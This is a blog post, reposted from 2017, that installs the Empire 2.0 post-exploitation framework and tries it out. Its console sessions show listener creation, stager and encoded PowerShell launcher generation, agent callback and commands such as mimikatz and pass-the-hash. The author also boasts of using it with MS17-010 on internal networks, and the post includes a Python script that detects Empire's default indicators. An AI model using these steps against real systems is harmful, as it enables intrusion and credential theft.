
Empire 2.0: installing and trying out the PowerShell post-exploitation tool

休止千鹤 | 05/01/2021

This article comes from my old blog, May 2017. Things may have changed since. At the time the system's built-in Python was 2.7 by default; while reorganizing it I made some changes to the original wording.

It was shortly after MS17-010, and Empire combined with the MS17-010 exploit let me get through quite a few internal networks back then (script kiddie). This article, however, is only an introduction and a trial run.

Note: things have changed. I just read the comments and checked the Empire project, and it is no longer being updated.

Miscellaneous preface

Just a few days ago, after finishing pile after pile of things (installing msf on the RPi and configuring its database, messing with NFC canteen cards, and so on), I stumbled upon a great tool: Empire.

It does a great deal entirely through PowerShell, avoiding detection; it can log keystrokes, and Mimikatz is included. It is a very impressive framework.

(This article is an install-and-try write-up, mainly introductory; experienced readers can close it and spend their valuable time learning something else.)

So today we will install it and see how an attack is carried out.

A quote from the official site:

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

Empire official site

↑ Image linked from the official site. Looks cool, doesn't it?

Naturally this gets installed on the Raspberry Pi again; after all, it is the only thing that counts as a decent energy-saving server. Yes, still OSMC, which has now turned into a pentest box. (Aside: I recently picked up an Orange Pi and plan to turn it into a portable pentest tool. If it works out I may write that up too.)

Installation & troubleshooting

(Skip this section if you already have it installed.)

The official site points straight to GitHub:

git clone https://github.com/EmpireProject/Empire.git
cd Empire/
cd setup/
./install.sh
 [!]This script must be run as root
# ...right, it wants root
sudo ./install.sh

Back in the previous directory, ./empire failed to start because OpenSSL was missing. I ran pip install, and then pip itself errored out (for no obvious reason):

Traceback (most recent call last):
  File "/usr/bin/pip", line 9, in <module>
    load_entry_point('pip==1.5.6', 'console_scripts', 'pip')()
  File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 356, in load_entry_point
    return get_distribution(dist).load_entry_point(group, name)
  File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 2476, in load_entry_point
    return ep.load()
  File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 2190, in load
    ['__name__'])
  File "/usr/lib/python2.7/dist-packages/pip/__init__.py", line 74, in <module>
    from pip.vcs import git, mercurial, subversion, bazaar  # noqa
  File "/usr/lib/python2.7/dist-packages/pip/vcs/mercurial.py", line 9, in <module>
    from pip.download import path_to_url
  File "/usr/lib/python2.7/dist-packages/pip/download.py", line 25, in <module>
    from requests.compat import IncompleteRead
ImportError: cannot import name IncompleteRead

(Re-edited in 2021; the original rambled far too much here.)
Reinstalling pip fixed it.
Install the dependencies while at it:

sudo apt-get remove python-pip
sudo apt-get autoremove
sudo easy_install pip
sudo pip install pyopenssl netifaces zlib-wrapper

Only then did Empire start. To be precise, Empire 2.0:

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.0 | [Web] https://theempire.io
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       267 modules currently loaded

       0 listeners currently active

       0 agents currently active


(Empire) >

A simple usage demo

Since this is 2.0, the operation differs from earlier versions; it took me a while to figure out.

Listeners here are the same thing as MSF handlers. Agents correspond to MSF sessions. Once those basic concepts are clear, the rest is straightforward.

Our goal: have the RPi start a listener over HTTP, then generate a DLL payload and a PowerShell one-liner, and trick the target into executing it (a BadUSB would also work; in short, a command has to be executed).

Creating the listener

(Empire) > listeners
[!] No listeners currently active 
(Empire: listeners) > help

Listener Commands
=================
agents            Jump to the Agents menu.
back              Go back to the main menu.
exit              Exit Empire.
help              Displays the help menu.
info              Display information for the given active listener.
kill              Kill one or all active listeners.
launcher          Generate an initial launcher for a listener.
list              List all active listeners (or agents).
main              Go back to the main menu.
uselistener       Use an Empire listener module.
usestager         Use an Empire stager.

(Empire: listeners) > uselistener 
dbx           http          http_com      http_foreign  http_hop      meterpreter     
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info

    Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        http                             Name for the listener.
  Launcher          True        powershell -noP -w 1 -enc        Launcher string.
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  StagingKey        True        NLgp2rGjSu}k%RlUc*{zF:aKDCn[qev~ Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  Host              True        http://192.168.0.101:89          Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  Port              True        89                               Port for the listener.


(Empire: listeners/http) > set Name HttpListener
(Empire: listeners/http) > execute
[*] Starting listener 'HttpListener'
[+] Listener successfully started!
(Empire: listeners/http) >

Generating the payload

Type main to get back to the main menu.

(Editor's note: meaning of the commands used below)

usestager windows/ lists the stagers available for Windows
I used dll here
info shows the details of the chosen stager

set Listener HttpListener sets the listener the agent calls back to
set Arch x86 sets the architecture; my machine is old and 32-bit, so x86
execute generates it

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.0 | [Web] https://theempire.io
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       267 modules currently loaded

       1 listeners currently active

       0 agents currently active


(Empire) > usestager windows/
bunny         dll           ducky         hta           launcher_bat  launcher_sct  launcher_vbs  macro         teensy        
(Empire) > usestager windows/dll
(Empire: stager/windows/dll) > info

Name: DLL Launcher

Description:
  Generate a PowerPick Reflective DLL to inject with
  stager code.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True        http              Listener to use.
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  Language         True        powershell        Language of the stager to generate.
  OutFile          True        /tmp/launcher.dll File to output dll to.
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Arch             True        x86               Architecture of the .dll to generate
                                                 (x64 or x86).
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.


(Empire: stager/windows/dll) > set Listener HttpListener
(Empire: stager/windows/dll) > set Arch x86
(Empire: stager/windows/dll) > execute

[*] Stager output written out to: /tmp/launcher.dll

(Empire: stager/windows/dll) > listeners

[*] Active listeners:

  Name              Module          Host                                 Delay/Jitter   KillDate
  ----              ------          ----                                 ------------   --------
  HttpListener      http            http://192.168.0.101:89              5/0.0                      

(Empire: listeners) > launcher powershell HttpListener
powershell -noP -w 1 -enc [base64 launcher removed]
(Empire: listeners) > [+] Initial agent 1R8T9BNA from 192.168.0.100 now active

(Empire: listeners) > agents

[*] Active agents:

  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen
  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------
  1R8T9BNA        ps    192.168.1.133   DESKTOP-NO77T28 DESKTOP-NO77T28\restpowershell/4060     5/0.0    2017-05-21 20:14:12

(Empire: agents) >

Then we paste the big blob just generated into a cmd window and run it. (My Huorong AV popped up a block saying PowerShell wanted network access.) An agent comes back, and the cmd window flashes by.

That is equivalent to getting a session in MSF.

A quick look at the target

There are still some problems, so I will just paste two info outputs for you.

Executing commands takes a very long time, I don't know why. Listing directories in particular gets almost no response. Privilege escalation did not succeed.
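From the defender's side, the listener defaults shown above (the GET/POST profile URIs, the IE 11 User-Agent, the Microsoft-IIS/7.5 server header and the `powershell -noP -w 1 -enc` launcher shape) are exactly what a detection rule keys on. The following is an added example, not code from the original post or the Empire project; the proxy log layout and the sample log lines are constructed assumptions.

```python
import re

# Indicator values copied from the Empire 2.0 listener/stager defaults printed above.
DEFAULT_URIS = ("/admin/get.php", "/news.php", "/login/process.php")
DEFAULT_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
DEFAULT_SERVER = "Microsoft-IIS/7.5"
# Launcher shape from the listener options: powershell -noP -w 1 -enc <base64>
LAUNCHER_RE = re.compile(
    r"powershell(?:\.exe)?\s+-nop\s+-w\s+1\s+-enc\s+[A-Za-z0-9+/=]{32,}", re.IGNORECASE)
# Assumed proxy log layout: client_ip method url "user-agent" "server-header"
PROXY_LINE_RE = re.compile(r'^(\S+)\s+(\S+)\s+(\S+)\s+"([^"]*)"\s+"([^"]*)"$')

# Constructed sample logs; the base64 blob is a placeholder, not a real stager.
SAMPLE_PROXY = [
    '192.168.1.133 GET http://192.168.0.101:89/admin/get.php '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "Microsoft-IIS/7.5"',
    '192.168.1.50 GET http://intranet/news.php "Mozilla/5.0 (Windows NT 10.0) Firefox/88.0" "nginx"',
]
SAMPLE_PROCS = [
    "powershell -noP -w 1 -enc " + "A" * 64,
    "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

def http_indicators(line):
    """Return the Empire-default indicators matched by one proxy log line."""
    m = PROXY_LINE_RE.match(line)
    if not m:
        return []
    _client, _method, url, ua, server = m.groups()
    path = re.sub(r"^https?://[^/]+", "", url).split("?", 1)[0]
    hits = []
    if path in DEFAULT_URIS:
        hits.append("default_uri:" + path)
    if ua == DEFAULT_UA:
        hits.append("default_user_agent")
    if server == DEFAULT_SERVER and path in DEFAULT_URIS:
        hits.append("default_server_header")
    return hits

def is_launcher(cmdline):
    """True if a process command line has the encoded Empire launcher shape."""
    return LAUNCHER_RE.search(cmdline) is not None

def scan(proxy_lines, process_lines):
    """One default URI alone is weak (real sites use such paths); require two indicators."""
    alerts = [("http", h) for h in map(http_indicators, proxy_lines) if len(h) >= 2]
    alerts += [("process", cmd) for cmd in process_lines if is_launcher(cmd)]
    return alerts
```

Running `scan(SAMPLE_PROXY, SAMPLE_PROCS)` flags the first proxy line (three indicators) and the first command line, while the ordinary news.php request and the signed backup script pass.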

(Empire: listeners) > agents

[*] Active agents:

  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen
  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------
  1R8T9BNA        ps    192.168.1.133   DESKTOP-NO77T28 DESKTOP-NO77T28\restpowershell/4060     5/0.0    2017-05-21 20:14:12

(Empire: agents) > help

Commands
========
back              Go back to the main menu.
clear             Clear one or more agent's taskings.
creds             Display/return credentials from the database.
exit              Exit Empire.
help              Displays the help menu.
interact          Interact with a particular agent.
kill              Task one or more agents to exit.
killdate          Set the killdate for one or more agents (killdate [agent/all] 01/01/2016).
list              Lists all active agents (or listeners).
listeners         Jump to the listeners menu.
lostlimit         Task one or more agents to 'lostlimit [agent/all] [number of missed callbacks] '
main              Go back to the main menu.
remove            Remove one or more agents from the database.
rename            Rename a particular agent.
searchmodule      Search Empire module names/descriptions.
sleep             Task one or more agents to 'sleep [agent/all] interval [jitter]'
usemodule         Use an Empire PowerShell module.
usestager         Use an Empire stager.
workinghours      Set the workinghours for one or more agents (workinghours [agent/all] 9:00-17:00).

(Empire: agents) > interact 1R8T9BNA
(Empire: 1R8T9BNA) > help

Agent Commands
==============
agents            Jump to the Agents menu.
back              Go back a menu.
bypassuac         Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>
clear             Clear out agent tasking.
creds             Display/return credentials from the database.
download          Task an agent to download a file.
exit              Task agent to exit.
help              Displays the help menu or syntax for particular commands.
info              Display information about this agent
injectshellcode   Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>
jobs              Return jobs or kill a running job.
kill              Task an agent to kill a particular process name or ID.
killdate          Get or set an agent's killdate (01/01/2016).
list              Lists all active agents (or listeners).
listeners         Jump to the listeners menu.
lostlimit         Task an agent to change the limit on lost agent detection
main              Go back to the main menu.
mimikatz          Runs Invoke-Mimikatz on the client.
psinject          Inject a launcher into a remote process. Ex. psinject <listener> <pid/process_name>
pth               Executes PTH for a CredID through Mimikatz.
rename            Rename the agent.
revtoself         Uses credentials/tokens to revert token privileges.
sc                Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]
scriptcmd         Execute a function in the currently imported PowerShell script.
scriptimport      Imports a PowerShell script and keeps it in memory in the agent.
searchmodule      Search Empire module names/descriptions.
shell             Task an agent to use a shell command.
sleep             Task an agent to 'sleep interval [jitter]'
spawn             Spawns a new Empire agent for the given listener name. Ex. spawn <listener>
steal_token       Uses credentials/tokens to impersonate a token for a given process ID.
sysinfo           Task an agent to get system information.
updateprofile     Update an agent connection profile.
upload            Task an agent to upload a file.
usemodule         Use an Empire PowerShell module.
workinghours      Get or set an agent's working hours (9:00-17:00).

(Empire: 1R8T9BNA) > sysinfo
(Empire: 1R8T9BNA) > sysinfo: 0|http://192.168.0.101:89|DESKTOP-NO77T28|rest|DESKTOP-NO77T28|192.168.1.133|Microsoft Windows 10 教育版|False|powershell|4060|powershell|5

(Empire: 1R8T9BNA) > info

[*] Agent info:

    nonce               7085646166885544
    jitter              0.0
    servers             None
    internal_ip         192.168.1.133
    working_hours       
    session_key         bYy3w$)K`>-.Jj;&@vEDSaMP|meFZT(!
    children            None
    checkin_time        2017-05-21 20:14:06
    hostname            DESKTOP-NO77T28
    id                  1
    delay               5
    username            DESKTOP-NO77T28\rest
    kill_date           
    parent              None
    process_name        powershell
    listener            HttpListener
    process_id          4060
    profile             /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT
                                6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    os_details          Microsoft Windows 10 教育版
    lost_limit          60
    taskings            
    name                1R8T9BNA
    language            powershell
    external_ip         192.168.0.100
    session_id          1R8T9BNA
    lastseen_time       2017-05-21 20:18:37
    language_version    5
    high_integrity      0

(Empire: 1R8T9BNA) >


 Comments


lee:

The article was just written, so why not install the latest version? The latest Empire is 2.5.


restkhz (admin):

lee said: The article was just written, so why not install the latest version? The latest Empire is 2.5.
I wrote this article back in 2017. Last year the blog was moved and the system changed, so many article links broke. Someone had linked to this one, so I might as well restore it. If you really need it, feel free to leave a comment or something... I am considering writing a new one on the latest version. Also... does nobody leave an email address?!